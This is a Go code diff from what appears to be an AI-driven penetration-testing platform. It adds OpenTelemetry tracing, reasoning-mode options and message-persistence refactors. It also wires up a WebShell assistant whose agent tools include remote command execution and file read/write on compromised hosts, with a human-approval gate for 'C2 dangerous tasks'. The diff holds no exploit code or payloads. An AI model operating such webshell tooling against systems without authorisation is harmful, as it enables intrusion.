||||
}
|
||||
if ti := tool.ConvCallbackInput(in); ti != nil {
|
||||
raw := ti.ArgumentsInJSON
|
||||
return "tool args=" + truncateRunes(raw, maxRunes)
|
||||
}
|
||||
b, err := json.Marshal(in)
|
||||
if err != nil {
|
||||
return fmt.Sprintf("%T", in)
|
||||
}
|
||||
return truncateRunes(string(b), maxRunes)
|
||||
}
|
||||
|
||||
func summarizeCallbackOutput(out callbacks.CallbackOutput, maxRunes int) string {
|
||||
if out == nil {
|
||||
return ""
|
||||
}
|
||||
if ao := adk.ConvAgentCallbackOutput(out); ao != nil {
|
||||
return "agent_events=stream"
|
||||
}
|
||||
if mo := model.ConvCallbackOutput(out); mo != nil && mo.Message != nil {
|
||||
s := ""
|
||||
if mo.Message.Content != "" {
|
||||
s = mo.Message.Content
|
||||
}
|
||||
if mo.TokenUsage != nil {
|
||||
return fmt.Sprintf("tokens total=%d completion=%d prompt=%d text=%s",
|
||||
mo.TokenUsage.TotalTokens, mo.TokenUsage.CompletionTokens, mo.TokenUsage.PromptTokens,
|
||||
truncateRunes(s, minInt(120, maxRunes)))
|
||||
}
|
||||
return "assistant len=" + itoa(len(s))
|
||||
}
|
||||
if to := tool.ConvCallbackOutput(out); to != nil {
|
||||
if to.Response != "" {
|
||||
return truncateRunes(to.Response, maxRunes)
|
||||
}
|
||||
if to.ToolOutput != nil {
|
||||
return "tool_result multimodal"
|
||||
}
|
||||
}
|
||||
b, err := json.Marshal(out)
|
||||
if err != nil {
|
||||
return fmt.Sprintf("%T", out)
|
||||
}
|
||||
return truncateRunes(string(b), maxRunes)
|
||||
}
|
||||
|
||||
func minInt(a, b int) int {
|
||||
if a < b {
|
||||
return a
|
||||
}
|
||||
return b
|
||||
}
|
||||
|
||||
func itoa(n int) string {
|
||||
return fmt.Sprintf("%d", n)
|
||||
}
|
||||
|
||||
func truncateRunes(s string, maxRunes int) string {
|
||||
if maxRunes <= 0 {
|
||||
return ""
|
||||
}
|
||||
r := []rune(s)
|
||||
if len(r) <= maxRunes {
|
||||
return s
|
||||
}
|
||||
return string(r[:maxRunes]) + "…"
|
||||
}
|
||||
@@ -0,0 +1,26 @@
|
||||
package einoobserve
|
||||
|
||||
import (
|
||||
"context"
|
||||
"testing"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
)
|
||||
|
||||
func TestAttachAgentRunCallbacks_Disabled(t *testing.T) {
|
||||
ctx := context.Background()
|
||||
cfg := &config.MultiAgentEinoCallbacksConfig{Enabled: false}
|
||||
out := AttachAgentRunCallbacks(ctx, cfg, Params{})
|
||||
if out != ctx {
|
||||
t.Fatalf("expected same ctx when disabled")
|
||||
}
|
||||
}
|
||||
|
||||
func TestTruncateRunes(t *testing.T) {
|
||||
if got := truncateRunes("abc", 10); got != "abc" {
|
||||
t.Fatalf("got %q", got)
|
||||
}
|
||||
if got := truncateRunes("abcdefghij", 4); got != "abcd…" {
|
||||
t.Fatalf("got %q", got)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,111 @@
|
||||
package einoobserve
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"strings"
|
||||
"sync"
|
||||
|
||||
"cyberstrike-ai/internal/config"
|
||||
|
||||
"go.opentelemetry.io/otel"
|
||||
"go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp"
|
||||
"go.opentelemetry.io/otel/exporters/stdout/stdouttrace"
|
||||
"go.opentelemetry.io/otel/sdk/resource"
|
||||
sdktrace "go.opentelemetry.io/otel/sdk/trace"
|
||||
semconv "go.opentelemetry.io/otel/semconv/v1.26.0"
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
var (
|
||||
otelMu sync.Mutex
|
||||
otelShutdown func(context.Context) error
|
||||
otelInitialized bool
|
||||
)
|
||||
|
||||
// InitOtelFromConfig installs the global OpenTelemetry TracerProvider when
|
||||
// eino_callbacks.otel is enabled and exporter is not none. Safe to call multiple times.
|
||||
func InitOtelFromConfig(cfg *config.MultiAgentEinoCallbacksConfig, log *zap.Logger) (shutdown func(context.Context) error, err error) {
|
||||
shutdown = func(context.Context) error { return nil }
|
||||
if cfg == nil || !cfg.OtelTracingActive() {
|
||||
return shutdown, nil
|
||||
}
|
||||
|
||||
otelMu.Lock()
|
||||
defer otelMu.Unlock()
|
||||
if otelInitialized {
|
||||
if otelShutdown != nil {
|
||||
return otelShutdown, nil
|
||||
}
|
||||
return shutdown, nil
|
||||
}
|
||||
|
||||
oc := cfg.Otel
|
||||
expKind := oc.OtelExporterEffective()
|
||||
ctx := context.Background()
|
||||
|
||||
var exporter sdktrace.SpanExporter
|
||||
switch expKind {
|
||||
case "stdout":
|
||||
exporter, err = stdouttrace.New()
|
||||
if err != nil {
|
||||
return shutdown, fmt.Errorf("eino otel stdout exporter: %w", err)
|
||||
}
|
||||
case "otlphttp":
|
||||
ep := strings.TrimSpace(oc.OTLPEndpoint)
|
||||
if ep == "" {
|
||||
ep = "localhost:4318"
|
||||
}
|
||||
exporter, err = otlptracehttp.New(ctx,
|
||||
otlptracehttp.WithEndpoint(ep),
|
||||
otlptracehttp.WithURLPath("/v1/traces"),
|
||||
)
|
||||
if err != nil {
|
||||
return shutdown, fmt.Errorf("eino otel otlphttp exporter: %w", err)
|
||||
}
|
||||
default:
|
||||
return shutdown, nil
|
||||
}
|
||||
|
||||
res, err := resource.New(ctx,
|
||||
resource.WithAttributes(
|
||||
semconv.ServiceName(oc.ServiceNameEffective()),
|
||||
),
|
||||
)
|
||||
if err != nil {
|
||||
return shutdown, fmt.Errorf("eino otel resource: %w", err)
|
||||
}
|
||||
|
||||
sampler := sdktrace.ParentBased(sdktrace.TraceIDRatioBased(oc.SampleRatioEffective()))
|
||||
tp := sdktrace.NewTracerProvider(
|
||||
sdktrace.WithBatcher(exporter),
|
||||
sdktrace.WithResource(res),
|
||||
sdktrace.WithSampler(sampler),
|
||||
)
|
||||
otel.SetTracerProvider(tp)
|
||||
|
||||
otelShutdown = tp.Shutdown
|
||||
otelInitialized = true
|
||||
if log != nil {
|
||||
log.Info("eino otel: tracer provider initialized",
|
||||
zap.String("exporter", expKind),
|
||||
zap.String("service", oc.ServiceNameEffective()),
|
||||
zap.Float64("sample_ratio", oc.SampleRatioEffective()),
|
||||
)
|
||||
}
|
||||
return otelShutdown, nil
|
||||
}
|
||||
|
||||
// ShutdownOtel flushes and shuts down the global TracerProvider if it was installed.
|
||||
func ShutdownOtel(ctx context.Context) error {
|
||||
otelMu.Lock()
|
||||
fn := otelShutdown
|
||||
otelShutdown = nil
|
||||
inited := otelInitialized
|
||||
otelInitialized = false
|
||||
otelMu.Unlock()
|
||||
if !inited || fn == nil {
|
||||
return nil
|
||||
}
|
||||
return fn(ctx)
|
||||
}
|
||||
+368
-186
@@ -19,6 +19,8 @@ import (
|
||||
"cyberstrike-ai/internal/agent"
|
||||
"cyberstrike-ai/internal/config"
|
||||
"cyberstrike-ai/internal/database"
|
||||
"cyberstrike-ai/internal/reasoning"
|
||||
"cyberstrike-ai/internal/mcp"
|
||||
"cyberstrike-ai/internal/mcp/builtin"
|
||||
"cyberstrike-ai/internal/multiagent"
|
||||
|
||||
@@ -184,6 +186,14 @@ func (h *AgentHandler) SetHitlToolWhitelistSaver(s HitlToolWhitelistSaver) {
|
||||
h.hitlWhitelistSaver = s
|
||||
}
|
||||
|
||||
// HITLNeedsToolApproval 供 C2 危险任务门控:与会话侧人机协同及免审批白名单判定一致。
|
||||
func (h *AgentHandler) HITLNeedsToolApproval(conversationID, toolName string) bool {
|
||||
if h == nil || h.hitlManager == nil {
|
||||
return false
|
||||
}
|
||||
return h.hitlManager.NeedsToolApproval(conversationID, toolName)
|
||||
}
|
||||
|
||||
// ChatAttachment 聊天附件(用户上传的文件)
|
||||
type ChatAttachment struct {
|
||||
FileName string `json:"fileName"` // 展示用文件名
|
||||
@@ -192,6 +202,14 @@ type ChatAttachment struct {
|
||||
ServerPath string `json:"serverPath,omitempty"` // 已保存在 chat_uploads 下的绝对路径(由 POST /api/chat-uploads 返回)
|
||||
}
|
||||
|
||||
// ChatReasoningRequest 对话页「模型推理」意图(仅 Eino 路径消费;原生 agent-loop 忽略)。
|
||||
type ChatReasoningRequest struct {
|
||||
// Mode: default(跟随系统)| off | on | auto
|
||||
Mode string `json:"mode,omitempty"`
|
||||
// Effort: low | medium | high | max;空表示不指定(由系统默认与各 profile 决定)。
|
||||
Effort string `json:"effort,omitempty"`
|
||||
}
|
||||
|
||||
// ChatRequest 聊天请求
|
||||
type ChatRequest struct {
|
||||
Message string `json:"message" binding:"required"`
|
||||
@@ -200,10 +218,18 @@ type ChatRequest struct {
|
||||
Attachments []ChatAttachment `json:"attachments,omitempty"`
|
||||
WebShellConnectionID string `json:"webshellConnectionId,omitempty"` // WebShell 管理 - AI 助手:当前选中的连接 ID,仅使用 webshell_* 工具
|
||||
Hitl *HITLRequest `json:"hitl,omitempty"`
|
||||
Reasoning *ChatReasoningRequest `json:"reasoning,omitempty"`
|
||||
// Orchestration 仅对 /api/multi-agent、/api/multi-agent/stream:deep | plan_execute | supervisor;空则等同 deep。机器人/批量等无请求体时由服务端默认 deep。/api/eino-agent* 不使用此字段。
|
||||
Orchestration string `json:"orchestration,omitempty"`
|
||||
}
|
||||
|
||||
func chatReasoningToClientIntent(r *ChatReasoningRequest) *reasoning.ClientIntent {
|
||||
if r == nil {
|
||||
return nil
|
||||
}
|
||||
return &reasoning.ClientIntent{Mode: r.Mode, Effort: r.Effort}
|
||||
}
|
||||
|
||||
type HITLRequest struct {
|
||||
Enabled bool `json:"enabled"`
|
||||
Mode string `json:"mode,omitempty"`
|
||||
@@ -450,6 +476,57 @@ func appendAttachmentsToMessage(msg string, attachments []ChatAttachment, savedP
|
||||
return b.String()
|
||||
}
|
||||
|
||||
// appendAssistantMessageNotice 在助手消息末尾追加提示,避免覆盖已生成内容。
|
||||
// 若消息为空则直接写入提示;若已包含相同提示则保持不变。
|
||||
func (h *AgentHandler) appendAssistantMessageNotice(messageID, notice string) error {
|
||||
trimmedNotice := strings.TrimSpace(notice)
|
||||
if strings.TrimSpace(messageID) == "" || trimmedNotice == "" {
|
||||
return nil
|
||||
}
|
||||
_, err := h.db.Exec(
|
||||
`UPDATE messages
|
||||
SET content = CASE
|
||||
WHEN content IS NULL OR TRIM(content) = '' THEN ?
|
||||
WHEN INSTR(content, ?) > 0 THEN content
|
||||
ELSE content || '\n\n' || ?
|
||||
END,
|
||||
updated_at = ?
|
||||
WHERE id = ?`,
|
||||
trimmedNotice,
|
||||
trimmedNotice,
|
||||
trimmedNotice,
|
||||
time.Now(),
|
||||
messageID,
|
||||
)
|
||||
return err
|
||||
}
|
||||
|
||||
// mergeAssistantMessagePartialOnCancel 将取消前已生成的部分回复尽量合并进消息:
|
||||
// - content 为空或仅占位(处理中...)时,直接替换为 partial;
|
||||
// - 已有正文时,仅在尚未包含 partial 时追加,避免丢失与重复。
|
||||
func (h *AgentHandler) mergeAssistantMessagePartialOnCancel(messageID, partial string) error {
|
||||
trimmedPartial := strings.TrimSpace(partial)
|
||||
if strings.TrimSpace(messageID) == "" || trimmedPartial == "" {
|
||||
return nil
|
||||
}
|
||||
_, err := h.db.Exec(
|
||||
`UPDATE messages
|
||||
SET content = CASE
|
||||
WHEN content IS NULL OR TRIM(content) = '' OR TRIM(content) = '处理中...' THEN ?
|
||||
WHEN INSTR(content, ?) > 0 THEN content
|
||||
ELSE content || '\n\n' || ?
|
||||
END,
|
||||
updated_at = ?
|
||||
WHERE id = ?`,
|
||||
trimmedPartial,
|
||||
trimmedPartial,
|
||||
trimmedPartial,
|
||||
time.Now(),
|
||||
messageID,
|
||||
)
|
||||
return err
|
||||
}
|
||||
|
||||
// ChatResponse 聊天响应
|
||||
type ChatResponse struct {
|
||||
Response string `json:"response"`
|
||||
@@ -507,14 +584,7 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
|
||||
h.logger.Warn("获取历史消息失败", zap.Error(err))
|
||||
agentHistoryMessages = []agent.ChatMessage{}
|
||||
} else {
|
||||
// 将数据库消息转换为Agent消息格式
|
||||
agentHistoryMessages = make([]agent.ChatMessage, 0, len(historyMessages))
|
||||
for _, msg := range historyMessages {
|
||||
agentHistoryMessages = append(agentHistoryMessages, agent.ChatMessage{
|
||||
Role: msg.Role,
|
||||
Content: msg.Content,
|
||||
})
|
||||
}
|
||||
agentHistoryMessages = dbMessagesToAgentChatMessages(historyMessages)
|
||||
h.logger.Info("从消息表加载历史消息", zap.Int("count", len(agentHistoryMessages)))
|
||||
}
|
||||
} else {
|
||||
@@ -539,12 +609,7 @@ func (h *AgentHandler) AgentLoop(c *gin.Context) {
|
||||
c.JSON(http.StatusBadRequest, gin.H{"error": "未找到该 WebShell 连接"})
|
||||
return
|
||||
}
|
||||
remark := conn.Remark
|
||||
if remark == "" {
|
||||
remark = conn.URL
|
||||
}
|
||||
webshellContext := fmt.Sprintf("[WebShell 助手上下文] 当前连接 ID:%s,备注:%s。可用工具(仅在该连接上操作时使用,connection_id 填 \"%s\"):webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_knowledge_risk_types、search_knowledge_base。Skills 包请使用「多代理 / Eino DeepAgent」会话中的内置 `skill` 工具渐进加载。\n\n用户请求:%s",
|
||||
conn.ID, remark, conn.ID, req.Message)
|
||||
webshellContext := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, req.Message)
|
||||
// WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具)
|
||||
if req.Role != "" && req.Role != "默认" && h.config.Roles != nil {
|
||||
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" {
|
||||
@@ -720,28 +785,22 @@ func (h *AgentHandler) ProcessMessageForRobot(ctx context.Context, conversationI
|
||||
progressCallback,
|
||||
h.agentsMarkdownDir,
|
||||
"deep",
|
||||
nil,
|
||||
)
|
||||
if errMA != nil {
|
||||
h.persistEinoAgentTraceForResume(conversationID, resultMA)
|
||||
if shouldPersistEinoAgentTraceAfterRunError(ctx) {
|
||||
h.persistEinoAgentTraceForResume(conversationID, resultMA)
|
||||
}
|
||||
errMsg := "执行失败: " + errMA.Error()
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
|
||||
}
|
||||
return "", conversationID, errMA
|
||||
}
|
||||
if assistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(resultMA.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(resultMA.MCPExecutionIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, err = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
resultMA.Response, mcpIDsJSON, assistantMessageID,
|
||||
)
|
||||
if err != nil {
|
||||
h.logger.Warn("机器人:更新助手消息失败", zap.Error(err))
|
||||
if errU := h.db.UpdateAssistantMessageFinalize(assistantMessageID, resultMA.Response, resultMA.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(resultMA.LastAgentTraceInput)); errU != nil {
|
||||
h.logger.Warn("机器人:更新助手消息失败", zap.Error(errU))
|
||||
}
|
||||
} else {
|
||||
if _, err = h.db.AddMessage(conversationID, "assistant", resultMA.Response, resultMA.MCPExecutionIDs); err != nil {
|
||||
@@ -758,7 +817,7 @@ func (h *AgentHandler) ProcessMessageForRobot(ctx context.Context, conversationI
|
||||
if err != nil {
|
||||
errMsg := "执行失败: " + err.Error()
|
||||
if assistantMessageID != "" {
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ? WHERE id = ?", errMsg, assistantMessageID)
|
||||
_, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID)
|
||||
_ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil)
|
||||
}
|
||||
return "", conversationID, err
|
||||
@@ -766,17 +825,8 @@ func (h *AgentHandler) ProcessMessageForRobot(ctx context.Context, conversationI
|
||||
|
||||
// 更新助手消息内容与 MCP 执行 ID(与 stream 一致)
|
||||
if assistantMessageID != "" {
|
||||
mcpIDsJSON := ""
|
||||
if len(result.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
|
||||
mcpIDsJSON = string(jsonData)
|
||||
}
|
||||
_, err = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
result.Response, mcpIDsJSON, assistantMessageID,
|
||||
)
|
||||
if err != nil {
|
||||
h.logger.Warn("机器人:更新助手消息失败", zap.Error(err))
|
||||
if errU := h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput)); errU != nil {
|
||||
h.logger.Warn("机器人:更新助手消息失败", zap.Error(errU))
|
||||
}
|
||||
} else {
|
||||
if _, err = h.db.AddMessage(conversationID, "assistant", result.Response, result.MCPExecutionIDs); err != nil {
|
||||
@@ -834,10 +884,12 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
||||
return ""
|
||||
}
|
||||
|
||||
// thinking_stream_*:不逐条落库,按 streamId 聚合,在后续关键事件前补一条可持久化的 thinking
|
||||
// thinking_stream_*(ReAct 等助手正文流)与 reasoning_chain_stream_*(Eino ReasoningContent):
|
||||
// 不逐条落库,按 streamId 聚合,flush 时分别落 thinking / reasoning_chain。
|
||||
type thinkingBuf struct {
|
||||
b strings.Builder
|
||||
meta map[string]interface{}
|
||||
b strings.Builder
|
||||
meta map[string]interface{}
|
||||
persistAs string // "thinking" | "reasoning_chain"
|
||||
}
|
||||
thinkingStreams := make(map[string]*thinkingBuf) // streamId -> buf
|
||||
flushedThinking := make(map[string]bool) // streamId -> flushed
|
||||
@@ -891,8 +943,12 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
||||
}
|
||||
data[k] = v
|
||||
}
|
||||
if err := h.db.AddProcessDetail(assistantMessageID, conversationID, "thinking", content, data); err != nil {
|
||||
h.logger.Warn("保存过程详情失败", zap.Error(err), zap.String("eventType", "thinking"))
|
||||
persist := tb.persistAs
|
||||
if persist != "reasoning_chain" {
|
||||
persist = "thinking"
|
||||
}
|
||||
if err := h.db.AddProcessDetail(assistantMessageID, conversationID, persist, content, data); err != nil {
|
||||
h.logger.Warn("保存过程详情失败", zap.Error(err), zap.String("eventType", persist))
|
||||
}
|
||||
flushedThinking[sid] = true
|
||||
}
|
||||
@@ -1120,14 +1176,20 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
||||
return
|
||||
}
|
||||
|
||||
// 聚合 thinking_stream_*(ReasoningContent),不逐条落库
|
||||
if eventType == "thinking_stream_start" {
|
||||
// 聚合 thinking_stream_* / reasoning_chain_stream_*,不逐条落库
|
||||
if eventType == "thinking_stream_start" || eventType == "reasoning_chain_stream_start" {
|
||||
persistAs := "thinking"
|
||||
if eventType == "reasoning_chain_stream_start" {
|
||||
persistAs = "reasoning_chain"
|
||||
}
|
||||
if dataMap, ok := data.(map[string]interface{}); ok {
|
||||
if sid, ok2 := dataMap["streamId"].(string); ok2 && sid != "" {
|
||||
tb := thinkingStreams[sid]
|
||||
if tb == nil {
|
||||
tb = &thinkingBuf{meta: map[string]interface{}{}}
|
||||
tb = &thinkingBuf{meta: map[string]interface{}{}, persistAs: persistAs}
|
||||
thinkingStreams[sid] = tb
|
||||
} else {
|
||||
tb.persistAs = persistAs
|
||||
}
|
||||
// 记录元信息(source/einoAgent/einoRole/iteration 等)
|
||||
for k, v := range dataMap {
|
||||
@@ -1137,15 +1199,21 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
||||
}
|
||||
return
|
||||
}
|
||||
if eventType == "thinking_stream_delta" {
|
||||
if eventType == "thinking_stream_delta" || eventType == "reasoning_chain_stream_delta" {
|
||||
persistAs := "thinking"
|
||||
if eventType == "reasoning_chain_stream_delta" {
|
||||
persistAs = "reasoning_chain"
|
||||
}
|
||||
if dataMap, ok := data.(map[string]interface{}); ok {
|
||||
if sid, ok2 := dataMap["streamId"].(string); ok2 && sid != "" {
|
||||
tb := thinkingStreams[sid]
|
||||
if tb == nil {
|
||||
tb = &thinkingBuf{meta: map[string]interface{}{}}
|
||||
tb = &thinkingBuf{meta: map[string]interface{}{}, persistAs: persistAs}
|
||||
thinkingStreams[sid] = tb
|
||||
} else if tb.persistAs == "" {
|
||||
tb.persistAs = persistAs
|
||||
}
|
||||
// delta 片段直接拼接;message 本身就是 reasoning content
|
||||
// delta 片段直接拼接
|
||||
tb.b.WriteString(message)
|
||||
// 有时 delta 先到 start 未到,补充元信息
|
||||
for k, v := range dataMap {
|
||||
@@ -1156,10 +1224,9 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
||||
return
|
||||
}
|
||||
|
||||
// 当 Agent 同时发送 thinking_stream_* 和 thinking(带同一 streamId)时,
|
||||
// thinking_stream_* 已经会在 flushThinkingStreams() 聚合落库;
|
||||
// 这里跳过同 streamId 的 thinking,避免 processDetails 双份展示。
|
||||
if eventType == "thinking" {
|
||||
// 当 Agent 同时发送 *_stream_* 与同名 streamId 的 thinking/reasoning_chain 时,
|
||||
// 流式聚合已会在 flushThinkingStreams() 落库;此处跳过逐条重复。
|
||||
if eventType == "thinking" || eventType == "reasoning_chain" {
|
||||
if dataMap, ok := data.(map[string]interface{}); ok {
|
||||
if sid, ok2 := dataMap["streamId"].(string); ok2 && sid != "" {
|
||||
if tb, exists := thinkingStreams[sid]; exists && tb != nil {
|
||||
@@ -1182,13 +1249,17 @@ func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun
|
||||
eventType != "response_start" &&
|
||||
eventType != "response_delta" &&
|
||||
eventType != "tool_result_delta" &&
|
||||
eventType != "eino_trace_run" &&
|
||||
eventType != "eino_trace_start" &&
|
||||
eventType != "eino_trace_end" &&
|
||||
eventType != "eino_trace_error" &&
|
||||
eventType != "eino_agent_reply_stream_start" &&
|
||||
eventType != "eino_agent_reply_stream_delta" &&
|
||||
eventType != "eino_agent_reply_stream_end" {
|
||||
if eventType == "tool_result" {
|
||||
discardPlanningIfEchoesToolResult(&respPlan, data)
|
||||
}
|
||||
// 在关键过程事件落库前,先把「规划中」与 thinking_stream 落库
|
||||
// 在关键过程事件落库前,先把「规划中」与聚合中的 thinking / reasoning_chain 流落库
|
||||
flushResponsePlan()
|
||||
flushThinkingStreams()
|
||||
if err := h.db.AddProcessDetail(assistantMessageID, conversationID, eventType, message, data); err != nil {
|
||||
@@ -1370,14 +1441,7 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
h.logger.Warn("获取历史消息失败", zap.Error(err))
|
||||
agentHistoryMessages = []agent.ChatMessage{}
|
||||
} else {
|
||||
// 将数据库消息转换为Agent消息格式
|
||||
agentHistoryMessages = make([]agent.ChatMessage, 0, len(historyMessages))
|
||||
for _, msg := range historyMessages {
|
||||
agentHistoryMessages = append(agentHistoryMessages, agent.ChatMessage{
|
||||
Role: msg.Role,
|
||||
Content: msg.Content,
|
||||
})
|
||||
}
|
||||
agentHistoryMessages = dbMessagesToAgentChatMessages(historyMessages)
|
||||
h.logger.Info("从消息表加载历史消息", zap.Int("count", len(agentHistoryMessages)))
|
||||
}
|
||||
} else {
|
||||
@@ -1400,12 +1464,7 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
sendEvent("error", "未找到该 WebShell 连接", nil)
|
||||
return
|
||||
}
|
||||
remark := conn.Remark
|
||||
if remark == "" {
|
||||
remark = conn.URL
|
||||
}
|
||||
webshellContext := fmt.Sprintf("[WebShell 助手上下文] 当前连接 ID:%s,备注:%s。可用工具(仅在该连接上操作时使用,connection_id 填 \"%s\"):webshell_exec、webshell_file_list、webshell_file_read、webshell_file_write、record_vulnerability、list_knowledge_risk_types、search_knowledge_base。Skills 包请使用「多代理 / Eino DeepAgent」会话中的内置 `skill` 工具渐进加载。\n\n用户请求:%s",
|
||||
conn.ID, remark, conn.ID, req.Message)
|
||||
webshellContext := BuildWebshellAssistantContext(conn, WebshellSkillHintDefault, req.Message)
|
||||
// WebShell 模式下如果同时指定了角色,追加角色 user_prompt(工具集仍仅限 webshell 专用工具)
|
||||
if req.Role != "" && req.Role != "默认" && h.config.Roles != nil {
|
||||
if role, exists := h.config.Roles[req.Role]; exists && role.Enabled && role.UserPrompt != "" {
|
||||
@@ -1495,6 +1554,8 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute)
|
||||
defer timeoutCancel()
|
||||
defer cancelWithCause(nil)
|
||||
taskCtx = mcp.WithMCPConversationID(taskCtx, conversationID)
|
||||
taskCtx = mcp.WithToolRunRegistry(taskCtx, h.tasks)
|
||||
progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
taskCtx = h.injectReactHITLInterceptor(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent)
|
||||
|
||||
@@ -1517,9 +1578,9 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
// 更新助手消息内容并保存错误详情到数据库
|
||||
if assistantMessageID != "" {
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ? WHERE id = ?",
|
||||
"UPDATE messages SET content = ?, updated_at = ? WHERE id = ?",
|
||||
errorMsg,
|
||||
assistantMessageID,
|
||||
time.Now(), assistantMessageID,
|
||||
); updateErr != nil {
|
||||
h.logger.Warn("更新错误后的助手消息失败", zap.Error(updateErr))
|
||||
}
|
||||
@@ -1570,11 +1631,12 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
h.tasks.UpdateTaskStatus(conversationID, taskStatus)
|
||||
|
||||
if assistantMessageID != "" {
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ? WHERE id = ?",
|
||||
cancelMsg,
|
||||
assistantMessageID,
|
||||
); updateErr != nil {
|
||||
if result != nil {
|
||||
if updateErr := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); updateErr != nil {
|
||||
h.logger.Warn("合并取消前的部分回复失败", zap.Error(updateErr))
|
||||
}
|
||||
}
|
||||
if updateErr := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); updateErr != nil {
|
||||
h.logger.Warn("更新取消后的助手消息失败", zap.Error(updateErr))
|
||||
}
|
||||
h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil)
|
||||
@@ -1606,9 +1668,9 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
|
||||
if assistantMessageID != "" {
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ? WHERE id = ?",
|
||||
"UPDATE messages SET content = ?, updated_at = ? WHERE id = ?",
|
||||
timeoutMsg,
|
||||
assistantMessageID,
|
||||
time.Now(), assistantMessageID,
|
||||
); updateErr != nil {
|
||||
h.logger.Warn("更新超时后的助手消息失败", zap.Error(updateErr))
|
||||
}
|
||||
@@ -1641,9 +1703,9 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
|
||||
if assistantMessageID != "" {
|
||||
if _, updateErr := h.db.Exec(
|
||||
"UPDATE messages SET content = ? WHERE id = ?",
|
||||
"UPDATE messages SET content = ?, updated_at = ? WHERE id = ?",
|
||||
errorMsg,
|
||||
assistantMessageID,
|
||||
time.Now(), assistantMessageID,
|
||||
); updateErr != nil {
|
||||
h.logger.Warn("更新失败后的助手消息失败", zap.Error(updateErr))
|
||||
}
|
||||
@@ -1672,20 +1734,8 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
|
||||
// 更新助手消息内容
|
||||
if assistantMsg != nil {
|
||||
_, err = h.db.Exec(
|
||||
"UPDATE messages SET content = ?, mcp_execution_ids = ? WHERE id = ?",
|
||||
result.Response,
|
||||
func() string {
|
||||
if len(result.MCPExecutionIDs) > 0 {
|
||||
jsonData, _ := json.Marshal(result.MCPExecutionIDs)
|
||||
return string(jsonData)
|
||||
}
|
||||
return ""
|
||||
}(),
|
||||
assistantMessageID,
|
||||
)
|
||||
if err != nil {
|
||||
h.logger.Error("更新助手消息失败", zap.Error(err))
|
||||
if errU := h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput)); errU != nil {
|
||||
h.logger.Error("更新助手消息失败", zap.Error(errU))
|
||||
}
|
||||
} else {
|
||||
// 如果之前创建失败,现在创建
|
||||
@@ -1719,6 +1769,8 @@ func (h *AgentHandler) AgentLoopStream(c *gin.Context) {
|
||||
func (h *AgentHandler) CancelAgentLoop(c *gin.Context) {
|
||||
var req struct {
|
||||
ConversationID string `json:"conversationId" binding:"required"`
|
||||
Reason string `json:"reason,omitempty"`
|
||||
ContinueAfter bool `json:"continueAfter,omitempty"`
|
||||
}
|
||||
|
||||
if err := c.ShouldBindJSON(&req); err != nil {
|
||||
@@ -1726,7 +1778,64 @@ func (h *AgentHandler) CancelAgentLoop(c *gin.Context) {
|
||||
return
|
||||
}
|
||||
|
||||
